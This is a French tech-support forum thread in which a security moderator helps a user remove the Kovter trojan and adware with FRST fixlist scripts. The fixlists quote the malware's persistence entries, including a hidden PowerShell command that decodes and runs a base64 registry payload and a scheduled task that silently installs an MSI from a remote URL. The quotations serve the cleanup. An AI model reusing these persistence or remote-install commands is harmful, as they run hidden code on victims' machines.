J'ai un virus "Gerfuphqitather Configuration"
Fermé
hicham
-
15 févr. 2017 à 14:12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 15 févr. 2017 à 17:43
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 15 févr. 2017 à 17:43
A voir également:
- J'ai un virus "Gerfuphqitather Configuration"
- Ethernet n'a pas de configuration ip valide - Guide
- Panneau de configuration - Guide
- Retablir configuration usine chromecast - Guide
- Youtu.be virus - Accueil - Guide virus
- Svchost.exe virus - Guide
3 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 659
15 févr. 2017 à 14:25
15 févr. 2017 à 14:25
Salut,
Tu as aussi le Trojan Kovter.
Désinstalle :
SMADAV
Traffic Exchange
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Tu as aussi le Trojan Kovter.
Désinstalle :
SMADAV
Traffic Exchange
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CloseProcesses:
CreateRestorePoint:
HKLM\...\Run: [SMΔRT-Protection] => C:\Program Files\Smadav\SMΔRTP.exe [1736704 2017-01-23] (Smadsoft)
reg: reg delete "HKCU\Software\Classes\\YpkJLQdZYa"
HKU\S-1-5-21-2808438390-3724675289-4109448453-1000\...\Run: [{F3AC57FE-E85A-47B7-A737-6BB04BB4F4F8}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\YpkJLQdZYa').EHBDLQCPHZLD)));
HKU\S-1-5-21-2808438390-3724675289-4109448453-1000\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-2808438390-3724675289-4109448453-1000\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-2808438390-3724675289-4109448453-1000\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-2808438390-3724675289-4109448453-1000\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
ShellExecuteHooks: Pas de nom - {B193EFBA-DE49-11E6-817E-64006A5CFC23} - C:\Users\acer\AppData\Roaming\Atotoent\Babolerearge.dll -> Pas de fichier
ShellExecuteHooks: Pas de nom - {C73EC60A-DE4B-11E6-A854-64006A5CFC23} - C:\Users\acer\AppData\Roaming\Thertsparimoly\Ariwase.dll -> Pas de fichier
S2 Fenghtchiqesy; C:\Program Files\Hiulysaey\SyfDebuger.dll [X]
2017-02-05 17:57 - 2017-02-05 17:59 - 44464044 _____ C:\Users\acer\Downloads\Spyhunter version 4 cracked.zip
2017-02-05 17:56 - 2017-02-05 17:56 - 00942897 _____ C:\Users\acer\Downloads\Spyhunter-4.5.7.3531-Serial-Key-Generator (3).zip
2017-02-05 17:51 - 2017-02-05 17:51 - 00942897 _____ C:\Users\acer\Downloads\Spyhunter-4.5.7.3531-Serial-Key-Generator (2).zip
2017-02-05 17:51 - 2017-02-05 17:51 - 00942897 _____ C:\Users\acer\Downloads\Spyhunter-4.5.7.3531-Serial-Key-Generator (1).zip
2017-02-05 17:50 - 2017-02-05 17:50 - 00942897 _____ C:\Users\acer\Downloads\Spyhunter-4.5.7.3531-Serial-Key-Generator.zip
2017-02-05 17:43 - 2017-02-05 17:43 - 15768485 _____ C:\Users\acer\Downloads\SpyHunter 4 Plus CRACK with Serial keys (1).rar
2017-02-05 17:38 - 2017-02-05 17:38 - 15768485 _____ C:\Users\acer\Downloads\SpyHunter 4 Plus CRACK with Serial keys.rar
2017-02-05 17:35 - 2017-02-05 17:35 - 00546304 _____ C:\Users\acer\Downloads\Spyhunter_4_Crack_Keygen_Serial_Final_Download.exe
2017-02-05 17:31 - 2017-02-05 17:31 - 00431984 _____ C:\Users\acer\Downloads\SpyHunter 4 Crack (3).zip
2017-02-05 17:03 - 2017-02-05 21:21 - 00000000 ____D C:\Users\acer\AppData\Roaming\Thertsparimoly
2017-02-05 17:02 - 2017-02-05 17:02 - 00431993 _____ C:\Users\acer\Downloads\SpyHunter 4 Crack (2).zip
2017-02-05 17:00 - 2017-02-05 17:00 - 00431992 _____ C:\Users\acer\Downloads\SpyHunter 4 Crack (1).zip
2017-02-05 16:59 - 2017-02-05 17:01 - 00000000 ____D C:\Users\acer\AppData\Roaming\UCChannel
2017-02-05 16:59 - 2017-02-05 16:59 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-02-05 16:58 - 2017-02-05 16:58 - 00432001 _____ C:\Users\acer\Downloads\SpyHunter 4 Crack.zip
2017-02-05 16:56 - 2017-02-05 16:56 - 00432013 _____ C:\Users\acer\Downloads\Spyhunter 4 Crack Setup.zip
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
C:\Program Files\Smadav
Task: {8E0F7B96-8C1F-4B3D-BEC1-094D25BD4DCF} - System32\Tasks\{9757A0FC-9041-4B12-815F-E9E81D314294}
Task: {02F13FD4-43E1-4E76-BFC0-F03A7B99F582} - System32\Tasks\Stuwittuhiph => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXMQ01ABF050_13B6P01WTXX13B6P01WT&%3Bv=201723 /q <==== ATTENTION
017-02-15 11:27 - 2016-05-22 16:36 - 00000000 ____D C:\Users\acer\AppData\Roaming\Smadav
C:\Program Files\Microleaves
Task: C:\Windows\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: {9A7D97FB-3BF6-4B64-AA87-55B8A2853A50} - System32\Tasks\smadav => C:\Program Files\Smadav\SMΔRTP.exe [2017-01-23] (Smadsoft)
Task: {9B215ED9-A6D1-4429-A54A-4C06296E5ACF} - System32\Tasks\Coerersp Client => C:\Program Files\Kukther\huret.exe
ShortcutWithArgument: C:\Users\acer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
ShortcutWithArgument: C:\Users\acer\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\acer\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
ShortcutWithArgument: C:\Users\acer\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
ShortcutWithArgument: C:\Users\acer\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\acer\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\acer\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\acer\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Bonjour à tous,
j'ai supprimer SMADAV mais j'ai pas trouver Traffic Exchange pour disinstaller
j'ai encore le virus dans mon pc ( C:\Program Files\Gerfuphqitather Configurationun)
voila le resultat d'une deuxieme analyse:
addition.txt
http://pjjoint.malekal.com/files.php?id=20170215_x14b8p7t8b5
FRST
http://pjjoint.malekal.com/files.php?id=FRST_20170215_d11j6y14i10k15
Si une personne peut m'aider.
Merci.
j'ai supprimer SMADAV mais j'ai pas trouver Traffic Exchange pour disinstaller
j'ai encore le virus dans mon pc ( C:\Program Files\Gerfuphqitather Configurationun)
voila le resultat d'une deuxieme analyse:
addition.txt
http://pjjoint.malekal.com/files.php?id=20170215_x14b8p7t8b5
FRST
http://pjjoint.malekal.com/files.php?id=FRST_20170215_d11j6y14i10k15
Si une personne peut m'aider.
Merci.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 659
15 févr. 2017 à 17:43
15 févr. 2017 à 17:43
désinstalle AVG Web TuneUp
sert à rien.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Refais un scan FRST et donne les rapports à nouveau.
sert à rien.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2808438390-3724675289-4109448453-1000\...\Run: [comrepl] => C:\Users\acer\AppData\Roaming\com\comrepl.exe [7293280 2013-02-19] (TeamViewer GmbH)
2017-02-12 13:56 - 2017-02-12 13:56 - 03516080 _____ (Enigma Software Group USA, LLC.) C:\Users\acer\Downloads\SpyHunter-Installer.exe
C:\Program Files\Gerfuphqitather
HKLM\...\Providers\t5sy9j1d: C:\Program Files\Gerfuphqitather Configuration\local32spl.dll [276480 2017-02-03] ()
C:\Users\acer\AppData\Roaming\com
Task: {592064EB-B9B0-47DF-BA93-9061F9E22C3B} - System32\Tasks\Gerfuphqitather Configuration => C:\Program Files\Hiulysaey\pipele.exe
C:\Program Files\Hiulysaey
2017-02-12 13:31 - 2017-02-12 13:31 - 00000600 _____ C:\Users\acer\AppData\Local\PUTTY.RND
2017-02-03 23:39 - 2017-02-03 23:39 - 00000000 ____D C:\Users\Public\Thunder Network
2017-02-03 23:39 - 2017-02-03 23:39 - 00000000 ____D C:\ProgramData\Thunder Network
2017-02-03 23:38 - 2017-02-04 00:07 - 00000000 ____D C:\Users\acer\AppData\Roaming\Atotoent
2017-02-03 23:38 - 2017-02-03 23:38 - 00000000 ___HD C:\Users\acer\AppData\Roaming\com
2017-02-12 13:25 - 2017-02-12 13:25 - 00000000 ____D C:\Users\acer\AppData\Local\CrashRpt
2017-02-12 13:24 - 2017-02-12 13:25 - 00000000 ____D C:\Users\acer\AppData\Roaming\WiperSoft
2017-02-12 13:22 - 2017-02-12 13:23 - 01944616 _____ (WiperSoft) C:\Users\acer\Downloads\WiperSoft-installer.exe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Refais un scan FRST et donne les rapports à nouveau.
